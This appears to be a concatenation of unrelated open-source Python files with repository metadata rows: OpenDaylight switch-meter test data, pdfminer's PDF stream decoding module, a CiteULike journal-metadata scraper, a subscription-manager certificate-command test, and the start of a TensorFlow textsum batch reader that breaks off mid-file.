'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.packets', expected_data)
def test_meter_switch_port_receive_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(12740, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(12180, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.bytes', expected_data)
def test_meter_switch_port_transmit_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(12110, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(12670, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.bytes', expected_data)
def test_meter_switch_port_receive_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.drops', expected_data)
def test_meter_switch_port_transmit_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.drops', expected_data)
def test_meter_switch_port_receive_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.errors', expected_data)
def test_meter_switch_port_transmit_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.transmit.errors', expected_data)
def test_meter_switch_port_receive_frame_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.frame_error', expected_data)
def test_meter_switch_port_receive_overrun_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.overrun_error',
expected_data)
def test_meter_switch_port_receive_crc_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.crc_error', expected_data)
def test_meter_switch_port_collision_count(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.collision.count', expected_data)
def test_meter_switch_table(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table', expected_data)
def test_meter_switch_table_active_entries(self):
expected_data = [
(11, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(20, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table.active.entries', expected_data)
def test_meter_switch_table_lookup_packets(self):
expected_data = [
(816, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(10, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table.lookup.packets', expected_data)
def test_meter_switch_table_matched_packets(self):
expected_data = [
(220, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
(5, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1'}),
]
self._test_for_meter('switch.table.matched.packets', expected_data)
def test_meter_switch_flow(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"
}),
]
self._test_for_meter('switch.flow', expected_data)
def test_meter_switch_flow_duration_seconds(self):
expected_data = [
(1828, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(5648, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_seconds', expected_data)
def test_meter_switch_flow_duration_nanoseconds(self):
expected_data = [
(397000000, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(200000, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_nanoseconds', expected_data)
def test_meter_switch_flow_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(30, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.packets', expected_data)
def test_meter_switch_flow_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
(89, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '1',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.2",
"flow_actions_@type": "output",
"flow_actions_port_id": "4",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:03",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.bytes', expected_data)
| apache-2.0 | 4,576,517,831,753,559,600 | 37.857562 | 79 | 0.389299 | false |
3L3N4/metagoofil | pdfminer/pdftypes.py | 26 | 7735 | #!/usr/bin/env python2
import sys
import zlib
from lzw import lzwdecode
from ascii85 import ascii85decode, asciihexdecode
from runlength import rldecode
from psparser import PSException, PSObject
from psparser import LIT, KWD, STRICT
LITERAL_CRYPT = LIT('Crypt')
# Abbreviation of Filter names in PDF 4.8.6. "Inline Images"
LITERALS_FLATE_DECODE = (LIT('FlateDecode'), LIT('Fl'))
LITERALS_LZW_DECODE = (LIT('LZWDecode'), LIT('LZW'))
LITERALS_ASCII85_DECODE = (LIT('ASCII85Decode'), LIT('A85'))
LITERALS_ASCIIHEX_DECODE = (LIT('ASCIIHexDecode'), LIT('AHx'))
LITERALS_RUNLENGTH_DECODE = (LIT('RunLengthDecode'), LIT('RL'))
LITERALS_CCITTFAX_DECODE = (LIT('CCITTFaxDecode'), LIT('CCF'))
LITERALS_DCT_DECODE = (LIT('DCTDecode'), LIT('DCT'))
## PDF Objects
##
class PDFObject(PSObject): pass
class PDFException(PSException): pass
class PDFTypeError(PDFException): pass
class PDFValueError(PDFException): pass
class PDFNotImplementedError(PSException): pass
## PDFObjRef
##
class PDFObjRef(PDFObject):
def __init__(self, doc, objid, _):
if objid == 0:
if STRICT:
raise PDFValueError('PDF object id cannot be 0.')
self.doc = doc
self.objid = objid
#self.genno = genno # Never used.
return
def __repr__(self):
return '<PDFObjRef:%d>' % (self.objid)
def resolve(self):
return self.doc.getobj(self.objid)
# resolve
def resolve1(x):
"""Resolves an object.
If this is an array or dictionary, it may still contains
some indirect objects inside.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
return x
def resolve_all(x):
"""Recursively resolves the given object and all the internals.
Make sure there is no indirect reference within the nested object.
This procedure might be slow.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
if isinstance(x, list):
x = [ resolve_all(v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = resolve_all(v)
return x
def decipher_all(decipher, objid, genno, x):
"""Recursively deciphers the given object.
"""
if isinstance(x, str):
return decipher(objid, genno, x)
if isinstance(x, list):
x = [ decipher_all(decipher, objid, genno, v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = decipher_all(decipher, objid, genno, v)
return x
# Type cheking
def int_value(x):
x = resolve1(x)
if not isinstance(x, int):
if STRICT:
raise PDFTypeError('Integer required: %r' % x)
return 0
return x
def float_value(x):
x = resolve1(x)
if not isinstance(x, float):
if STRICT:
raise PDFTypeError('Float required: %r' % x)
return 0.0
return x
def num_value(x):
x = resolve1(x)
if not (isinstance(x, int) or isinstance(x, float)):
if STRICT:
raise PDFTypeError('Int or Float required: %r' % x)
return 0
return x
def str_value(x):
x = resolve1(x)
if not isinstance(x, str):
if STRICT:
raise PDFTypeError('String required: %r' % x)
return ''
return x
def list_value(x):
x = resolve1(x)
if not (isinstance(x, list) or isinstance(x, tuple)):
if STRICT:
raise PDFTypeError('List required: %r' % x)
return []
return x
def dict_value(x):
x = resolve1(x)
if not isinstance(x, dict):
if STRICT:
raise PDFTypeError('Dict required: %r' % x)
return {}
return x
def stream_value(x):
x = resolve1(x)
if not isinstance(x, PDFStream):
if STRICT:
raise PDFTypeError('PDFStream required: %r' % x)
return PDFStream({}, '')
return x
## PDFStream type
##
class PDFStream(PDFObject):
def __init__(self, attrs, rawdata, decipher=None):
assert isinstance(attrs, dict)
self.attrs = attrs
self.rawdata = rawdata
self.decipher = decipher
self.data = None
self.objid = None
self.genno = None
return
def set_objid(self, objid, genno):
self.objid = objid
self.genno = genno
return
def __repr__(self):
if self.data is None:
assert self.rawdata is not None
return '<PDFStream(%r): raw=%d, %r>' % (self.objid, len(self.rawdata), self.attrs)
else:
assert self.data is not None
return '<PDFStream(%r): len=%d, %r>' % (self.objid, len(self.data), self.attrs)
def __contains__(self, name):
return name in self.attrs
def __getitem__(self, name):
return self.attrs[name]
def get(self, name, default=None):
return self.attrs.get(name, default)
def get_any(self, names, default=None):
for name in names:
if name in self.attrs:
return self.attrs[name]
return default
def get_filters(self):
filters = self.get_any(('F', 'Filter'))
if not filters: return []
if isinstance(filters, list): return filters
return [ filters ]
def decode(self):
assert self.data is None and self.rawdata != None
data = self.rawdata
if self.decipher:
# Handle encryption
data = self.decipher(self.objid, self.genno, data)
filters = self.get_filters()
if not filters:
self.data = data
self.rawdata = None
return
for f in filters:
if f in LITERALS_FLATE_DECODE:
# will get errors if the document is encrypted.
try:
data = zlib.decompress(data)
except zlib.error:
data = ''
elif f in LITERALS_LZW_DECODE:
data = lzwdecode(data)
elif f in LITERALS_ASCII85_DECODE:
data = ascii85decode(data)
elif f in LITERALS_ASCIIHEX_DECODE:
data = asciihexdecode(data)
elif f in LITERALS_RUNLENGTH_DECODE:
data = rldecode(data)
elif f in LITERALS_CCITTFAX_DECODE:
#data = ccittfaxdecode(data)
raise PDFNotImplementedError('Unsupported filter: %r' % f)
elif f == LITERAL_CRYPT:
# not yet..
raise PDFNotImplementedError('/Crypt filter is unsupported')
else:
raise PDFNotImplementedError('Unsupported filter: %r' % f)
# apply predictors
params = self.get_any(('DP', 'DecodeParms', 'FDecodeParms'), {})
if 'Predictor' in params and 'Columns' in params:
pred = int_value(params['Predictor'])
columns = int_value(params['Columns'])
if pred:
if pred != 12:
raise PDFNotImplementedError('Unsupported predictor: %r' % pred)
buf = ''
ent0 = '\x00' * columns
for i in xrange(0, len(data), columns+1):
pred = data[i]
ent1 = data[i+1:i+1+columns]
if pred == '\x02':
ent1 = ''.join( chr((ord(a)+ord(b)) & 255) for (a,b) in zip(ent0,ent1) )
buf += ent1
ent0 = ent1
data = buf
self.data = data
self.rawdata = None
return
def get_data(self):
if self.data is None:
self.decode()
return self.data
def get_rawdata(self):
return self.rawdata
| gpl-2.0 | 4,280,389,643,255,911,000 | 28.98062 | 100 | 0.559664 | false |
egonw/citeulike | plugins/python/cases.py | 2 | 3673 | #!/usr/bin/env python
import os, sys, re, urllib2, cookielib, string
from urllib import urlencode
from urllib2 import urlopen
from copy import copy
import BeautifulSoup
import htmlentitydefs
import socket
socket.setdefaulttimeout(15)
class ParseException(Exception):
pass
##
# Removes HTML or XML character references and entities from a text string.
#
# @param text The HTML (or XML) source text.
# @return The plain text, as a Unicode string, if necessary.
def unescape(text):
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return unichr(int(text[3:-1], 16))
else:
return unichr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
return re.sub("&#?\w+;", fixup, text).encode('utf-8','ignore')
def meta(soup, key):
el = soup.find("meta", {'name':key})
if el:
return el['content'].encode('utf-8','ignore')
return None
def item(soup, entry, key):
el = meta(soup, key)
if el:
print "%s\t%s" % (entry, el)
def handle(url):
m = re.match(r'http://(?:www\.)?(jmedicalcasereports|casesjournal)\.com/(?:jmedicalcasereports|casesjournal)/article/view/(\d+)', url)
if not m:
raise ParseException, "URL not supported %s" % url
site = m.group(1)
wkey = m.group(2)
url = "http://%s.com/%s/article/viewArticle/%s" % (site, site, wkey)
page = urlopen(url).read()
soup = BeautifulSoup.BeautifulSoup(page)
head = soup.find("head")
doi = meta(head, 'citation_doi')
if not doi:
raise ParseException, "Cannot find DOI"
citation_pdf_url = meta(head, 'citation_pdf_url')
pdf_key = ""
if citation_pdf_url:
m = re.search(r'(\d+)/(\d+)', citation_pdf_url)
if m:
pdf_key = m.group(2)
print "begin_tsv"
print "linkout\tDOI\t\t%s\t\t" % (doi)
if site == "casesjournal":
print "linkout\tCASES\t%s\t\t%s\t" % (wkey, pdf_key)
elif site == "jmedicalcasereports":
print "linkout\tJMEDC\t%s\t\t%s\t" % (wkey, pdf_key)
else:
raise ParseException, "Unknown journal %s" % site
print "type\tJOUR"
title = meta(head, "citation_title")
if title:
print "title\t%s" % unescape(title)
item(head, "journal", "citation_journal_title")
item(head, "issue", "citation_issue")
item(head, "issn", "citation_issn")
date = meta(head, 'citation_date')
if date:
m = re.match(r'(\d+)/(\d+)/(\d+)', date)
if m:
day = m.group(1)
month = m.group(2)
year = m.group(3)
if year:
print "year\t%s" % year
if month:
print "month\t%s" % month
if day:
print "day\t%s" % day
# authors
authors = head.findAll("meta", {"name":"DC.Creator.PersonalName"})
if authors:
for a in authors:
print "author\t%s" % a['content'].encode('utf-8','ignore')
abstract = meta(head,"DC.Description")
if abstract:
abstract = abstract.strip()
abstract = re.sub(r'<[^>]+>','',abstract)
abstract = unescape(abstract)
abstract = abstract.strip()
print "abstract\t%s" % abstract
print "doi\t%s" % doi
print "end_tsv"
print "status\tok"
# read url from std input
url = sys.stdin.readline()
# get rid of the newline at the end
url = url.strip()
try:
handle(url)
except Exception, e:
import traceback
line = traceback.tb_lineno(sys.exc_info()[2])
print "\t".join(["status", "error", "There was an internal error processing this request. Please report this to [email protected] quoting error code %d." % line])
raise
| bsd-3-clause | -1,907,637,463,961,163,000 | 24.331034 | 164 | 0.622107 | false |
nguyenfilip/subscription-manager | test/test_rct_cert_command.py | 3 | 2207 | #
# Copyright (c) 2012 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import unittest
from mock import patch
from rhsm.certificate import CertificateException
from rct.cert_commands import RCTCertCommand
from subscription_manager.cli import InvalidCLIOptionError
class RCTCertCommandTests(unittest.TestCase):
def test_file_arg_required(self):
command = RCTCertCommand()
try:
command.main([])
self.fail("Expected InvalidCLIOptionError since no file arg.")
except InvalidCLIOptionError, e:
self.assertEqual("You must specify a certificate file.",
str(e))
def test_invalid_file_arg(self):
command = RCTCertCommand()
try:
command.main(["this_file_does_not_exist.crt"])
self.fail("Expected InvalidCLIOptionError since no file does not exist.")
except InvalidCLIOptionError, e:
self.assertEqual("The specified certificate file does not exist.", str(e))
@patch("os.path.isfile")
@patch("rhsm.certificate.create_from_file")
def test_valid_x509_required(self, mock_create, mock_isfile):
mock_create.side_effect = CertificateException("error!")
mock_isfile.return_value = True
command = RCTCertCommand()
command._do_command = lambda: command._create_cert()
try:
command.main(['dummy-file.pem'])
self.fail("Expected InvalidCLIOptionError since bad x509 file.")
except InvalidCLIOptionError, e:
self.assertEqual(
"Unable to read certificate file 'dummy-file.pem': error!",
str(e))
| gpl-2.0 | -6,185,564,035,410,825,000 | 37.719298 | 86 | 0.675578 | false |
alexgorban/models | research/textsum/batch_reader.py | 14 | 10400 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Batch reader to seq2seq attention model, with bucketing support."""
from collections import namedtuple
from random import shuffle
from threading import Thread
import time
import numpy as np
import six
from six.moves import queue as Queue
from six.moves import xrange
import tensorflow as tf
import data
ModelInput = namedtuple('ModelInput',
'enc_input dec_input target enc_len dec_len '
'origin_article origin_abstract')
BUCKET_CACHE_BATCH = 100
QUEUE_NUM_BATCH = 100
class Batcher(object):
"""Batch reader with shuffling and bucketing support."""
def __init__(self, data_path, vocab, hps,
article_key, abstract_key, max_article_sentences,
max_abstract_sentences, bucketing=True, truncate_input=False):
"""Batcher constructor.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary.
hps: Seq2SeqAttention model hyperparameters.
article_key: article feature key in tf.Example.
abstract_key: abstract feature key in tf.Example.
max_article_sentences: Max number of sentences used from article.
max_abstract_sentences: Max number of sentences used from abstract.
bucketing: Whether bucket articles of similar length into the same batch.
truncate_input: Whether to truncate input that is too long. Alternative is
to discard such examples.
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._article_key = article_key
self._abstract_key = abstract_key
self._max_article_sentences = max_article_sentences
self._max_abstract_sentences = max_abstract_sentences
self._bucketing = bucketing
self._truncate_input = truncate_input
self._input_queue = Queue.Queue(QUEUE_NUM_BATCH * self._hps.batch_size)
self._bucket_input_queue = Queue.Queue(QUEUE_NUM_BATCH)
self._input_threads = []
for _ in xrange(16):
self._input_threads.append(Thread(target=self._FillInputQueue))
self._input_threads[-1].daemon = True
self._input_threads[-1].start()
self._bucketing_threads = []
for _ in xrange(4):
self._bucketing_threads.append(Thread(target=self._FillBucketInputQueue))
self._bucketing_threads[-1].daemon = True
self._bucketing_threads[-1].start()
self._watch_thread = Thread(target=self._WatchThreads)
self._watch_thread.daemon = True
self._watch_thread.start()
def NextBatch(self):
"""Returns a batch of inputs for seq2seq attention model.
Returns:
enc_batch: A batch of encoder inputs [batch_size, hps.enc_timestamps].
dec_batch: A batch of decoder inputs [batch_size, hps.dec_timestamps].
target_batch: A batch of targets [batch_size, hps.dec_timestamps].
enc_input_len: encoder input lengths of the batch.
dec_input_len: decoder input lengths of the batch.
loss_weights: weights for loss function, 1 if not padded, 0 if padded.
origin_articles: original article words.
origin_abstracts: original abstract words.
"""
enc_batch = np.zeros(
(self._hps.batch_size, self._hps.enc_timesteps), dtype=np.int32)
enc_input_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
dec_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
dec_output_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
target_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
loss_weights = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.float32)
origin_articles = ['None'] * self._hps.batch_size
origin_abstracts = ['None'] * self._hps.batch_size
buckets = self._bucket_input_queue.get()
for i in xrange(self._hps.batch_size):
(enc_inputs, dec_inputs, targets, enc_input_len, dec_output_len,
article, abstract) = buckets[i]
origin_articles[i] = article
origin_abstracts[i] = abstract
enc_input_lens[i] = enc_input_len
dec_output_lens[i] = dec_output_len
enc_batch[i, :] = enc_inputs[:]
dec_batch[i, :] = dec_inputs[:]
target_batch[i, :] = targets[:]
for j in xrange(dec_output_len):
loss_weights[i][j] = 1
return (enc_batch, dec_batch, target_batch, enc_input_lens, dec_output_lens,
loss_weights, origin_articles, origin_abstracts)
def _FillInputQueue(self):
